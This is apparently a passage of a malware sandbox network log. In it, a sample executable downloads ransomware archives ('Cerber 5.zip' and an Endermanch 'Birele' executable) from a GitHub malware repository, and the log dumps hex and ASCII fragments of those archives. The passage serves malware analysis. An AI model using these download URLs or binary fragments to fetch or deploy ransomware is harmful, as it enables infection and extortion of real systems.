2022-09-29 12:49:55 UTC	400	IN	Data Raw: 50 4b 03 04 14 00 01 00 08 00 0f b9 98 3f 08 02 e3 81 f6 c4 01 00 00 d2 01 00 15 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 42 69 72 65 6c 65 2e 65 78 65 78 87 52 7a 1b 81 59 80 6e db ec 5d ee 26 6d 7c 09 66 bf 9b 5b ca c3 1f 74 30 22 7f 86 ac 21 7f ce 7d ef 5b c1 ea 5b 7a d1 dd b0 eb 9b 49 ce 14 14 68 6b 08 48 f5 ec a4 42 03 54 02 12 f6 9d 93 01 c2 cb 0f e2 c9 32 64 50 3b 29 65 4b c7 74 fb 81 69 1a 6f ea cc bb e0 e3 53 1a 43 74 5f 3b 59 df ff a6 59 84 cb 71 1b d4 44 3c e2 d1 f6 be 7b b7 a0 62 95 ae e0 1f d7 0b 6b 49 83 79 23 5c 2d cd 1a 45 47 6d c5 92 5f c5 70 88 d9 7e 4d 94 8b d3 5c a7 b8 c3 66 c3 60 fb 0e 89 2c e7 e4 b3 65 32 70 be fd 5f 58 7b 5e ca c4 22 8d 5e 0f d8 7e 6d 13 c2 f0 ff c8 0a 43 f1 0e ab 32 bd 72 24 c3 10 03 39 3e 75 13 eb 26 26 11 a6 bf Data Ascii: PK?Endermanch@Birele.exexRzYn]&m\|f[t0"!}[[zIhkHBT2dP;)eKtioSCt_;YYqD<{bkIy#\-EGm_p~M\f`,e2p_X{^"^~mC2r$9>u&&
2022-09-29 12:49:55 UTC	416	IN	Data Raw: d0 c8 6f b8 bd af f1 df 66 87 9a 7e fd b6 77 ca 44 32 b6 e7 9c 56 4c 9b 1d c9 17 fe c2 fb 3f 48 22 03 9e 02 2a 47 c7 30 bb 3e 6b 9c fd 3c b1 6f fd fc 13 d0 41 9f 51 54 c9 79 e0 45 0c 28 b0 f0 50 47 36 0c 16 93 29 66 33 6d 8d a9 b6 aa df 0c 0e 61 e1 f3 e4 8a 0a e7 ea 6d f3 f8 52 92 1a a7 0a d1 18 7e d5 9c b6 f9 7a 06 75 e2 58 84 0a f2 f5 48 e1 5e 20 9e a7 75 9a f3 63 3a c4 a0 83 20 05 0f d1 7d a6 12 4f ce ac b3 18 6f 47 47 38 38 6a 53 73 91 8f 00 16 a3 b4 c7 db 95 28 a2 ad 71 fd 54 f2 1b 26 6d 45 4f 74 38 73 60 21 c8 00 2e 82 63 52 20 cc be e4 d4 29 92 81 e0 4f 0b 14 08 ff 0a 8d 9c 95 d0 a9 6a 16 7e c7 af 5d 04 84 cd 1d 58 a6 73 66 04 d9 b4 86 6a b5 9a 9b 7b 9a d3 a7 b0 c3 a9 87 1e 2c 2d bb 2d 39 47 fc 3b bc ef 66 79 6e 61 c8 e9 bc 6e 00 a4 8f 1b e2 2f 42 Data Ascii: of~wD2VL?H"*G0>k<oAQTyE(PG6)f3mamR~zuXH^ uc: }OoGG88jSs(qT&mEOt8s`!.cR )Oj~]Xsfj{,--9G;fynan/B
2022-09-29 12:49:55 UTC	432	IN	Data Raw: 20 6a 5b d3 14 76 ba 3f 41 47 9d 45 4c 14 86 7f 02 77 7c cc 51 e0 d7 e5 e7 2e 84 cb 39 19 06 7c 42 86 72 5b ca 4b 79 da d8 2d 2d 85 30 67 06 0e 90 0f d5 4e 42 7c 12 06 27 c2 ed bf 55 ae 7a 51 d6 de bf c9 8e b0 95 7b 59 e8 89 01 d2 8c 75 a3 5d 10 ef 63 8a 63 35 da d3 67 85 21 36 3b 66 29 1d 4c 10 85 c9 7d f9 82 ab 23 91 91 44 da 54 2e cd e2 33 c0 57 6d 7f 44 ec 53 1c ad f8 ac 94 33 5b 2b 1f b8 70 44 57 2a fb 76 ea f7 39 ff 45 e9 71 4e 8e 6f 21 a0 95 9d d5 e6 26 91 4a 6f d5 06 78 99 d7 ec b5 53 b6 28 64 0b 5b 18 9c 7a a1 f8 0c b6 fc dd 19 49 48 dd cf 4f da 37 ad ba 0a 2c 8e 62 cb 0a fe 92 2d f0 41 be d9 ef 63 8f 42 d3 a5 1c 5d 95 9b 60 3a ea dc d4 ec f6 1b 8b e4 0d 31 e3 35 fb 29 cc 7a 9d 0a 61 b7 e9 79 a4 a2 ed 88 f4 82 a3 5e ed 7c 9b 15 cb f9 bc 8f 43 12 Data Ascii: j[v?AGELw\|Q.9\|Br[Ky--0gNB\|'UzQ{Yu]cc5g!6;f)L}#DT.3WmDS3[+pDW*v9EqNo!&JoxS(d[zIHO7,b-AcB]`:15)zay^\|C
2022-09-29 12:49:55 UTC	448	IN	Data Raw: f5 19 bb 37 94 5b bd a3 c7 eb 87 c0 8f ea 5e bb ec 1b 24 80 9b aa 2a 29 a6 84 88 16 72 c1 80 26 ae e4 0f e2 b0 1a a8 9b 8e 99 6c f5 2b bd 32 e8 a5 df 06 0b cd f6 7a 8b b8 ee 42 3c 3b d2 d1 f8 8a df 34 14 77 3b 39 9d f5 d1 44 7b bb 1f 46 ca 6b c0 7a 8c e6 dc 7f 4f ad 27 93 49 1d 69 51 47 ab 20 e4 e5 e1 b2 49 70 7a a1 60 24 83 fc c5 69 03 e5 cc 69 dd 0a 8c c3 e5 55 53 f0 e7 1c eb c6 5b 27 90 17 87 a5 1e a8 9e 68 81 b1 6e 18 46 d4 2b bd de f1 97 28 bd ce af 3b e0 28 05 30 2b dc ba 10 93 e6 f6 a2 16 a5 76 72 70 98 35 e6 bd a2 ad c6 b0 eb 75 12 26 0f c0 ee 40 63 1a 6b 57 a7 31 4b 82 3d 90 f4 05 04 9e c9 26 39 8c a6 dd f2 ba 10 cc 02 9b 78 ca d2 ec 9b be dd b0 e4 2f e1 8f 42 f4 82 af 1f a3 0f e7 50 f9 a4 1d ef 06 2d 5a b0 54 9a 75 14 07 f2 a9 67 aa 2f 6a a3 5c Data Ascii: 7[^$*)r&l+2zB<;4w;9D{FkzO'IiQG Ipz`$iiUS['hnF+(;(0+vrp5u&@ckW1K=&9x/BP-ZTug/j\
2022-09-29 12:49:55 UTC	464	IN	Data Raw: ca ea a1 2d 75 b0 19 3c 8c 4a 3c 06 10 11 06 e6 6a 3f 60 30 70 fb e5 ea 53 4c fc c1 a5 3f a3 33 f0 28 8d 3b 4b 89 5f ef 3e d9 b8 1c be 97 1e e8 f2 ab 7f 61 3d 43 0d 92 0e 5f 40 82 ff e7 e6 84 33 b4 d5 83 09 0e 48 79 33 fe 51 aa 08 fe fe 06 15 89 e0 7c 75 ed fe 99 5b 81 1c 81 95 f0 2d 6b a8 1f ff 71 f3 94 b7 1a cf e9 82 85 5b 24 e9 ed 9e dd f1 38 ec 79 e1 7f 73 ef 3e 8f 71 a9 06 84 53 ed 21 8f 81 45 62 45 38 2a b5 cf 98 23 54 6a 3a c2 f4 dd 6b 22 78 ec ec d9 d8 4d 9a 59 13 0d 57 e9 3c a1 39 fe 92 ad 58 98 18 0e 55 f1 86 28 31 a2 6e 3c bb 90 7e 8e 14 7f d3 8c 78 43 00 20 fe 05 40 bc 01 63 6b e8 32 6f 52 4b 19 d0 ab 3c a2 8c b5 b9 19 12 e8 4f 06 fe 5c 60 9c f8 1b 26 d5 65 b0 40 14 ea a7 b9 7c e4 ab 07 e8 b1 76 03 02 5f e8 48 d1 84 c4 96 d8 8d 8f c2 11 03 75 Data Ascii: -u<J<j?`0pSL?3(;K_>a=C_@3Hy3Q\|u[-kq[$8ys>qS!EbE8*#Tj:k"xMYW<9XU(1n<~xC @ck2oRK<O\`&e@\|v_Hu
2022-09-29 12:49:55 UTC	480	IN	Data Raw: 52 17 55 a4 43 09 06 7e 3a 7d 82 ce d4 05 34 23 ce d1 67 77 09 83 09 76 6c a7 9d c7 3f 21 dd 00 cf 5f 2e b6 ec aa d6 b9 bb 0f 02 b0 54 26 dd 89 7d 73 63 b0 8f 44 24 e4 06 d2 cd f6 ec 34 a9 9e a2 64 b1 5e 6c 4a 9e da f4 82 e1 94 db 6b e6 c3 2e 82 73 0d a4 6e cb bd 11 65 1f 68 e3 91 db 2e 0f 7e 3a 8d a0 9c 07 d7 4e 7a 9f 64 da 58 02 84 b1 73 b9 f3 e7 88 44 65 a5 05 24 5c 30 08 54 f8 38 04 2a 7b e3 6f fb 2e 5a 85 46 5a 2f a7 40 d1 5b d2 58 ca 63 65 52 75 ec 09 70 4d 81 82 19 82 ec 63 23 31 18 d1 03 4a 1b d9 f8 da 13 8d 0e 2c 14 17 e0 2d a2 ba 46 83 0c 16 b4 6a 42 16 67 fc d5 d4 51 9d 8b cd 52 ad 17 e0 47 58 e2 c0 96 63 bf 04 6b 77 60 09 c6 1c d4 43 6e 5e 35 bd df 52 60 6d 6a 4d a6 96 b4 da a2 8a 08 50 b7 ba 75 f9 70 37 87 4b 59 d1 ea 6d 97 ad 89 bf 61 d7 99 Data Ascii: RUC~:}4#gwvl?!_.T&}scD$4d^lJk.sneh.~:NzdXsDe$\0T8*{o.ZFZ/@[XceRupMc#1J,-FjBgQRGXckw`Cn^5R`mjMPup7KYma
2022-09-29 12:49:55 UTC	496	IN	Data Raw: 06 4e 72 bf f8 5c a6 65 95 70 02 af 5c 43 bb 5a df ad 63 6f 11 0e 88 d3 f3 84 e9 d0 8e 87 ed ad a4 7b 49 b5 74 1b dc fa c4 3a ab 2b b1 53 6d 8c 66 31 0a 9d 54 d9 2a 9c 03 71 eb d5 1c dc e9 1b 4e 7b 83 70 60 ef 3f 31 db 49 cc 6a 16 ca 3b fe 43 d5 b1 0a 58 12 45 cd af 39 53 1d 4e fe 11 53 a5 35 4a fe 62 ff 80 e2 91 21 98 c4 6f 81 52 32 70 fd eb b7 73 cf ff a4 02 9e 75 d2 dc 9a a1 f1 ee d5 1d ce f8 c7 2f 2c 4c 1b c3 d1 39 c9 cc 29 bb 7a 70 89 cd e6 42 4a d3 05 2a b0 f3 30 03 63 93 f2 5e 1e 07 4f 13 83 33 4c 1f 09 7e fb c6 92 e3 36 7c 8b 46 f8 e7 4f 06 c4 c4 f7 be af 18 4c 9b ff b1 a3 f7 20 59 85 cd 87 5b fb 3e 50 23 e5 bd bf 21 d4 d4 f5 7f e0 d2 4f a5 f0 29 f0 d1 05 a0 d2 14 89 a2 f6 d0 36 22 94 54 f6 13 6f 03 7d 0c 83 cd c4 3b 22 dd 4d 61 61 d7 f6 c8 a6 ac Data Ascii: Nr\ep\CZco{It:+Smf1TqN{p`?1Ij;CXE9SNS5Jb!oR2psu/,L9)zpBJ0c^O3L~6\|FOL Y[>P#!O)6"To};"Maa
2022-09-29 12:49:55 UTC	512	IN	Data Raw: e5 ab bf f1 59 8c ea b7 bd 6a f1 b9 57 73 3f b0 b8 e7 8d df 46 47 a3 cd 0e b2 7b ca d9 87 a0 db e2 d0 cb 92 38 cf 69 5e 59 39 8f 9c 3b 24 df 75 26 7a b8 4b 96 f5 c6 65 bb 71 ad ea b4 6b 0b 7f 45 10 b5 46 52 d2 e4 3c 36 c7 6c 28 c1 40 29 7e 89 ee 56 39 57 20 4a df 30 bc 7b df ac 37 66 73 19 63 69 f3 a6 f0 69 48 e5 73 a4 ea d8 79 62 48 24 c2 51 a7 4b cf f4 13 2b a0 6e 84 67 3b 91 ae 55 90 94 46 93 56 c7 d0 88 d0 18 6e 75 b7 b3 96 e3 43 09 4a f7 08 ac 74 63 b0 12 30 ec 3d 9d e4 62 d1 96 30 b8 69 22 48 1a 98 72 ac 90 59 a5 fb 86 2b a7 41 b2 6b 56 af 38 f7 31 2a ce 31 e2 05 a4 dc 01 d4 49 0d 0b 20 d0 00 99 f9 7b 0e f0 a5 80 11 84 ad 92 79 5e 38 9f 8b fb dc a4 77 f2 52 8c c8 c3 ff 1a 74 80 72 47 ff cf e6 a8 c5 e6 83 55 74 6e 40 e5 91 e1 a0 78 18 f9 73 2d 7e 08 Data Ascii: YjWs?FG{8i^Y9;$u&zKeqkEFR<6l(@)~V9W J0{7fsciiHsybH$QK+ng;UFVnuCJtc0=b0i"HrY+AkV81*1I {y^8wRtrGUtn@xs-~

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49722	140.82.121.4	443	C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp	kBytes transferred	Direction	Data
2022-09-29 12:50:02 UTC	513	OUT	GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip HTTP/1.1 Host: github.com
2022-09-29 12:50:02 UTC	513	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Thu, 29 Sep 2022 12:48:28 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Access-Control-Allow-Origin: https://render.githubusercontent.com Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
2022-09-29 12:50:02 UTC	514	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.6	49723	185.199.108.133	443	C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp	kBytes transferred	Direction	Data
2022-09-29 12:50:02 UTC	515	OUT	GET /Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip HTTP/1.1 Host: raw.githubusercontent.com
2022-09-29 12:50:02 UTC	515	IN	HTTP/1.1 200 OK Connection: close Content-Length: 185620 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: application/zip ETag: "2a6ab7c5316fce8fcdfa21d92de6f495abe9a21496869efff37027ac0d4eb5d5" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 9E7E:A32C:78ED2E:8681D5:6335928B Accept-Ranges: bytes Date: Thu, 29 Sep 2022 12:50:02 GMT Via: 1.1 varnish X-Served-By: cache-mxp6965-MXP X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1664455802.404701,VS0,VE1 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * X-Fastly-Request-ID: eb9be27824903db3c22c7f78be8619a86de746b9 Expires: Thu, 29 Sep 2022 12:55:02 GMT Source-Age: 91
2022-09-29 12:50:02 UTC	516	IN	Data Raw: 50 4b 03 04 14 00 01 00 08 00 01 9c f5 4a 57 39 9c 5a 62 d4 02 00 f8 e4 04 00 16 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 43 65 72 62 65 72 35 2e 65 78 65 b3 65 c3 dc f7 40 a4 56 9a af 6a f2 79 cc 2c 79 59 8b af 8c 38 0a 8c 54 10 a7 df ac af 7a 8c 29 fd c4 6e 49 ec 85 d0 b3 ed 8c 20 81 e7 7f fc 7e 72 5c 18 04 0c 93 d2 8e 0f 2e 35 72 7c 8b 97 fc cb 24 10 a0 1e 13 7d 3c 96 80 f9 8a 0c b4 3d 06 97 40 f1 3a 8d c7 b9 1b 60 0c f7 bf c0 c3 dd 3a d6 b5 b1 77 61 f3 44 af 99 7d d7 9a a9 2d 28 38 5c ec bf 85 4f c7 26 7e 99 af ed 48 bf 1f 7e 53 e2 4f 1c 29 93 32 9a 5f d5 7d 8c 9a 1a 45 92 80 a5 6e 26 4a 14 9b 3f f3 10 df ac c9 3b b1 17 e9 99 1c 76 2b 9c f7 83 4d fd bb 4e f3 b4 73 91 2f 63 d7 27 41 25 cc 91 4f 9b 5e 70 c2 ec 61 ad c0 c3 ea e5 8d 28 2b 1d 29 ae f4 f8 Data Ascii: PKJW9ZbEndermanch@Cerber5.exee@Vjy,yY8Tz)nI ~r\.5r\|$}<=@:`:waD}-(8\O&~H~SO)2_}En&J?;v+MNs/c'A%O^pa(+)
2022-09-29 12:50:02 UTC	518	IN	Data Raw: d1 84 c5 d4 4e f6 f4 7f c7 a7 1c b8 30 51 e8 9d 91 9a 16 79 a2 25 b4 d3 df c7 4a 50 85 d5 dc 4c 88 2e ad 06 da 0f 21 d5 8f 8b fb 83 fa d3 c4 3d 6a 14 15 6a 8a 1d ce af af fb 63 e8 46 9c eb 31 11 1f 63 fd db dc 01 4e d6 5e 48 1a f4 af 4d c3 3c b1 78 99 b0 fd 90 a3 0b 3c 55 6d c7 c8 93 29 5f 03 46 d1 90 28 37 5f 9e 18 47 19 62 b7 33 f3 80 31 03 63 88 39 d9 46 03 03 c5 29 88 6e d3 3a 7c ea 56 7a e7 15 77 c4 7b aa 77 a3 d3 d5 8e 16 f8 ac 49 98 b8 32 d8 41 30 75 e2 46 27 0c 4f 4a 5e 70 d1 6d d9 16 2d 20 be 45 30 fc b9 a6 45 e6 09 68 a5 f1 8d 06 3b ca 49 57 f7 46 90 06 35 f2 f9 36 29 3e 58 16 27 dc d5 d3 db c3 87 2a a6 5f cd f9 e2 8d 40 bd 6a 55 33 53 aa 4e 41 0b ad 90 e6 19 76 4a a0 11 08 bc 3c 07 63 3f 3e 55 e5 25 6f ff 68 04 86 12 f3 a3 ac 1a a0 10 7f be 42 Data Ascii: N0Qy%JPL.!=jjcF1cN^HM<x<Um)_F(7_Gb31c9F)n:\|Vzw{wI2A0uF'OJ^pm- E0Eh;IWF56)>X'*_@jU3SNAvJ<c?>U%ohB
2022-09-29 12:50:02 UTC	519	IN	Data Raw: e0 ca 21 7c 26 18 00 be af a3 fa 92 18 53 2d ec 80 7b 35 fe c9 c9 ae 2a c4 7a 7a 8b 8a 1f 2a c9 3c 1a ce fa 50 af cc f8 09 72 fb 18 db 8a 7c 0e 8f b5 c5 18 04 28 0d 53 91 74 a5 d3 3a eb 11 de f1 2f 6a 4e 66 f9 77 5e 3f a8 40 1d 71 ea a0 90 4f 13 ec 46 49 3b 85 91 a8 89 8d 3c 97 36 d8 da 81 29 ff 95 93 e9 bd 7c 46 9d 72 cb f6 d5 0f 58 ea d3 a0 91 6b 73 0f 54 dc 5f 51 8b 78 8f ba 6f 0d 79 db 4d dd 5b 9f 73 61 48 dc 9e 8f a5 02 28 b3 7f 58 af 81 c7 ac 5c 13 1b ad 23 67 50 87 8a 8d e4 91 bc cf cf e3 cd e4 50 34 96 f1 45 38 fe 96 55 0d bc f4 f0 8a d7 0d 02 8a b1 91 7a 2f ce bd dd eb cc 1c 72 38 12 81 26 a2 e0 ce 1b 17 04 9b 44 ab 36 31 ad f9 2d a7 92 23 19 3a 18 0f e5 66 e7 4f f5 ae 71 7d ac fd 25 c7 49 da f3 cd 69 52 06 1b e5 23 4e db ae 0f fa 0c f6 c9 8b 5f Data Ascii: !\|&S-{5zz<Pr\|(St:/jNfw^?@qOFI;<6)\|FrXksT_QxoyM[saH(X\#gPP4E8Uz/r8&D61-#:fOq}%IiR#N_
2022-09-29 12:50:02 UTC	520	IN	Data Raw: b1 95 ca 00 d2 01 23 1b 31 7a 44 41 2a a0 ce c8 8a 8c a2 54 2d fb 2a 90 19 79 56 37 dd f2 81 4a 00 be 74 46 79 3f 34 6a 41 e2 26 2f 8a 05 b3 5a ae be 0d 8c 92 a3 14 a5 03 06 f2 57 c6 a0 00 78 7a 00 ff e8 eb 33 b9 5a bc 8a f5 d2 42 71 61 2d 59 74 7b 2d fc 58 eb 5b 50 d1 ab 94 fa d6 4f 82 c8 52 0f be 99 f5 2f d8 ec 1a 49 30 40 b1 03 c3 fb d3 1f 9f 3b ba d7 09 58 83 96 e6 3a f5 9d 37 2a d0 cb d1 95 0e 99 06 de c3 86 96 f6 1c 0c d8 84 13 95 7c 04 e5 6d 94 6b 85 9b ef 0c 11 f7 77 35 6d f1 8a 24 18 fc 58 a5 1e e5 f0 07 b7 06 5b 13 22 16 43 c8 86 d6 4c 8c bd 7e b7 49 d5 13 c9 e1 cc 0c 2c f9 1d fb 23 67 f4 66 11 93 b5 4e 3a 87 13 2d 6d ba f6 d8 3a 7d 0b 60 0b a0 f0 77 08 a2 0e a1 bb e8 ad 64 4c 84 9d 50 b2 03 ff 87 5b bf 36 26 b8 9d 6a 31 f3 f3 80 30 24 22 f0 7d Data Ascii: #1zDAT-yV7JtFy?4jA&/ZWxz3ZBqa-Yt{-X[POR/I0@;X:7*\|mkw5m$X["CL~I,#gfN:-m:}`wdLP[6&j10$"}
2022-09-29 12:50:02 UTC	522	IN	Data Raw: 8a 2a c4 f8 91 89 1a 5d 81 8d 17 5c 48 09 db c2 d6 70 c8 40 ec dc 7e 10 a8 09 b1 11 50 4b 11 bb 35 88 1e 56 18 c3 b6 73 f4 e9 58 93 3e d6 bb f8 50 05 1f 85 47 c4 91 03 5c 57 96 4d df aa f7 f3 62 35 56 be a7 8c e1 b9 59 34 c1 bf 41 0e 15 ed 87 04 7f ae 41 f3 9a 17 6f 86 23 e8 44 bf 9b 29 94 14 c6 1c 1d f3 3b 3f 9f ee f7 03 51 31 15 28 fb 1b 57 b4 db 6a d5 8a 67 d8 90 83 07 75 03 19 b6 20 94 3a 9d 91 45 1f 46 a7 62 2e 4a f3 51 ca be 15 fe 9a bd 33 25 c4 b7 83 d6 33 00 01 b3 73 06 6c ab 09 b2 62 ec 83 44 b9 96 ae 45 cf 46 ab 45 5e f7 35 eb 08 6f b0 33 42 93 37 1a 3f 79 e4 ce 44 b9 f1 fa 26 31 2e d9 fb 95 12 bf e9 3c 72 31 30 75 60 89 53 ff 60 b5 ed ea 33 16 75 0d 3c 15 34 bb ee 4e 30 a5 80 46 b9 ed 2f 15 29 c5 3d aa 32 51 a3 c8 cc 99 b2 c0 de 96 08 6b 13 ec Data Ascii: *]\Hp@~PK5VsX>PG\WMb5VY4AAo#D);?Q1(Wjgu :EFb.JQ3%3slbDEFE^5o3B7?yD&1.<r10u`S`3u<4N0F/)=2Qk
2022-09-29 12:50:02 UTC	523	IN	Data Raw: f3 7a 2d ab 67 5d 75 fd ec da ee e2 3c 28 ef ea 02 43 29 18 7b f6 4c 1e ab 2c d9 93 a0 d0 23 3d 12 ef 10 19 0e 69 d2 74 7b 12 2f 6d fe d0 54 cf 72 9e 28 4b 58 d2 0f b8 69 b7 8d 61 11 26 52 6e 53 51 ce 18 88 d5 6d 93 6e 34 38 57 b9 e6 13 30 17 6d 88 9d e9 5d bb 12 83 e7 50 15 0e ad c0 4d fc ba 2e fc b7 2d 8c bc d7 7b ca 0c 6e 0d 73 83 1d 09 9a 8b 65 ef 20 50 4d f9 3c 01 14 86 47 dc ef e7 47 c3 38 59 d7 8a 53 d8 33 57 a8 99 7e 16 34 31 59 bb 79 af 32 89 80 e9 c1 d8 c7 c2 64 7b 6b 59 47 50 a6 40 3e 52 d2 18 14 c5 22 e6 88 79 aa 85 48 f4 1e fd 23 8c c5 75 56 40 97 be 91 1d fa a4 0a 78 db 75 c8 15 7c b3 0d 07 95 93 a4 8c 52 0d 96 32 e6 69 09 64 f0 e4 f5 7f b2 a6 b6 f1 7a 68 08 e6 3c 72 ac 68 1e 71 50 6f 3e ae 5b 8f 01 ca 68 70 7e f8 73 79 19 52 e0 b7 e0 27 24 Data Ascii: z-g]u<(C){L,#=it{/mTr(KXia&RnSQmn48W0m]PM.-{nse PM<GG8YS3W~41Yy2d{kYGP@>R"yH#uV@xu\|R2idzh<rhqPo>[hp~syR'$
2022-09-29 12:50:02 UTC	524	IN	Data Raw: bf 7c 25 8e c2 c9 aa 08 83 0e c2 68 e1 04 8c 82 d5 55 7c dc 99 29 49 dc f7 c6 15 b1 1f b7 5e 4f dc d9 46 8a 05 e1 1b 09 c0 54 99 20 ef 67 ad b6 30 bd e9 83 07 a7 f5 b1 83 60 1f 0b 35 3e 0a 68 ed 2d ad 54 1e f3 e3 e6 bc 95 d6 b5 12 9e bf b8 84 6f 2b df 9b e0 f7 0f f4 a1 11 f8 6e 9e e7 37 b9 00 68 2a a6 4c dc a7 97 61 8a a8 10 24 f9 e8 30 f9 e7 b6 04 4d 1e db 93 bc c2 85 bf 53 7a 1c 0c 0a 98 d7 ff d5 ee 6b 7c 55 93 da 75 05 9a 68 fc 8b e9 db a4 5a 36 d6 8b b8 7a 96 ed 20 af 4b f0 e1 8f b7 b8 6f 7e 7b 71 78 5e c5 eb 71 80 61 44 aa 11 92 78 92 f9 d7 49 08 91 57 78 37 82 ed 4b 49 6d dc 30 aa 59 79 d1 d6 3b 76 b2 ec 43 86 8a c9 b0 d8 7d 86 49 d3 a1 fb 32 d5 30 17 22 10 ea ab ae 64 32 5d ce 9e 29 12 3f c4 ba 1d bc 11 71 cc 44 c0 c1 0a 10 19 23 b3 b3 1c f4 1b e2 Data Ascii: \|%hU\|)I^OFT g0`5>h-To+n7h*La$0MSzk\|UuhZ6z Ko~{qx^qaDxIWx7KIm0Yy;vC}I20"d2])?qD#
2022-09-29 12:50:02 UTC	526	IN	Data Raw: 48 fc f7 dd 84 86 31 d7 41 75 61 f1 d6 42 07 f1 9a 00 14 2d 61 cd c8 f4 f0 d1 f2 f9 71 a0 0e 89 73 58 38 09 07 d0 ce 4f 59 31 78 0c 90 ad e8 f5 3d bd 8a 81 d5 bd f1 8b 87 f5 ce 73 e0 a2 89 e6 6b 84 8d c8 7a 36 92 2e 99 a9 c5 58 3b a2 c7 3f 22 4e 8a d5 4d 83 ae eb 15 af c3 52 c1 7d f9 9d 4c c1 f3 bd 1b b4 98 70 93 7c 5d d4 4b 63 3d 5f 65 ff df 79 85 cd 68 8d 1d 7d 3c 1a c8 32 a7 c9 82 41 86 1d 51 e2 7c 74 41 e9 83 3e 56 01 91 93 30 8a 23 5c 3d b9 d3 1a 5a 7c 32 7e b6 9e 48 29 05 08 60 1c 90 78 b2 06 f8 4e 88 94 86 16 7a 3a b9 9b 2b 12 90 c0 5d 6a 01 f9 45 16 87 7f 9e e5 19 51 9c 09 de 93 ed f0 9b 62 dd 74 41 bf fb 8e f1 fe 90 a6 93 db 2d 16 97 29 9a cd 82 10 46 b5 e7 3f 4c 3c 3d 65 66 af e0 d9 ff 14 52 8b 0b 2e 8c 39 da 67 bb 3a 0a d9 a1 8b 4c ea 36 64 4b Data Ascii: H1AuaB-aqsX8OY1x=skz6.X;?"NMR}Lp\|]Kc=_eyh}<2AQ\|tA>V0#\=Z\|2~H)`xNz:+]jEQbtA-)F?L<=efR.9g:L6dK
2022-09-29 12:50:02 UTC	527	IN	Data Raw: f4 75 34 ba 52 b4 52 83 cc 26 fb eb af b2 47 ec ec c3 bf 8a 38 3e 24 97 83 ec ef 8d 3b a0 5e 6f af 3f dc 96 b5 b1 e8 16 1f 57 23 0d f6 3d d3 d5 16 d6 3c a4 20 7d c3 fa a1 95 e2 27 5c 70 07 8e f2 2f 4c a4 97 68 55 41 c6 07 8d 96 8c f2 41 dc 6c f3 70 ef 2d e9 f6 25 bf b1 8e e4 b0 3a 8a 95 6b 32 34 c4 37 92 c2 16 95 b8 54 7b 1b 25 a3 60 18 3e 4f 2d 54 f5 ef 43 0e d9 a9 e4 b6 86 4f d5 52 95 c3 9b f0 50 ac 98 f0 9f 99 27 70 a3 c3 87 33 4b 24 84 6b 1c 91 ae 37 f3 bd 14 3c f3 68 91 47 d3 4b cf 31 67 38 8e 39 43 a6 98 9f 40 37 c3 94 25 9a e8 04 32 f4 51 2a 9d ae 94 47 1d 7a ba 13 6a 05 bc ba 1f 44 92 15 7b 2f 1d 42 d8 43 1d 02 e0 cf f8 ca c9 58 fb be 98 a0 26 e2 4a bb aa f2 fe fb 14 90 af 6b 34 44 e4 1a 44 7c a6 1a f8 e8 e1 e1 56 41 eb a2 2f fc b9 7c c6 d7 08 5f Data Ascii: u4RR&G8>$;^o?W#=< }'\p/LhUAAlp-%:k247T{%`>O-TCORP'p3K$k7<hGK1g89C@7%2Q*GzjD{/BCX&Jk4DD\|VA/\|_
